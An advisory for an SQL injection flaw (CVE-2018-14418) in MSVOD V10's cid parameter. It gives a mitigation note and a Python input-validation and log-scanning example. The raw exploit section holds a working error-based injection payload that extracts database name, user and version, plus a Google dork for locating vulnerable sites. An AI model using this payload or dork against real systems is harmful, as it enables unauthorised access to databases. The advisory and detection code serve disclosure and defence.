Vendor: MSVOD
By: Hzllaga
CVSS: 9.8 (CRITICAL)
Vulnerability: SQL Injection
CWE: 89
Product Name: MSVOD
Affected Version From: MSVOD V10
Affected Version To: MSVOD V10
Patch Exists: NO
Related CVE: CVE-2018-14418
CPE: a:msvod:msvod:10
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
Year: 2018

MSVOD V10 - SQL Injection

MSVOD V10 is vulnerable to SQL injection through the cid parameter of /images/lists. An attacker can exploit this vulnerability to read the database name, the database user and version information.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
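
One way to apply the input validation recommended above, together with a log check that applies the same rule to past requests. This is an added example, not code from MSVOD or from the original advisory. It assumes cid is meant to be a decimal integer and that requests are logged in combined log format; the function names and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Strict allow-list (assumption): a category id is 1-10 ASCII digits, nothing else.
CID_RE = re.compile(r"[0-9]{1,10}")
# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed sample lines (combined log format), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Jul/2018:10:00:01 +0000] '
    '"GET /images/lists?cid=13 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Jul/2018:10:00:09 +0000] '
    '"GET /images/lists?cid=13%20)%20ORDER%20BY%201%20desc HTTP/1.1" 500 312',
    '192.0.2.10 - - [17/Jul/2018:10:00:15 +0000] '
    '"GET /videos/lists?cid=abc HTTP/1.1" 200 900',
]


def validate_cid(raw):
    """Return cid as an int, or raise ValueError. Call before any query is built."""
    if not isinstance(raw, str) or not CID_RE.fullmatch(raw):
        raise ValueError("cid must be a decimal integer")
    return int(raw)


def suspicious_cid_requests(log_lines, path="/images/lists"):
    """Return (line_number, decoded_cid) for requests whose cid fails validation."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path != path:
            continue
        # parse_qs percent-decodes, so the value is checked as the application sees it.
        for value in parse_qs(url.query, keep_blank_values=True).get("cid", []):
            try:
                validate_cid(value)
            except ValueError:
                hits.append((n, value))
    return hits


if __name__ == "__main__":
    for line_no, value in suspicious_cid_requests(SAMPLE_LOG):
        print(f"line {line_no}: rejected cid {value!r}")
```

Validation of this kind narrows what reaches the query; binding cid as a parameter in the SQL statement is the complementary control.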

Exploit-DB raw data:

# Exploit Title: MSVOD V10 - SQL Injection
# Google Dork: inurl:"images/lists?cid=13"
# Date: 2018/07/17
# Exploit Author: Hzllaga
# Vendor Homepage: http://www.msvod.cc/
# Version: MSVOD V10
# CVE : CVE-2018-14418
#Reference : https://www.wtfsec.org/2583/msvod-v10-sql-injection/

Payload:
/images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20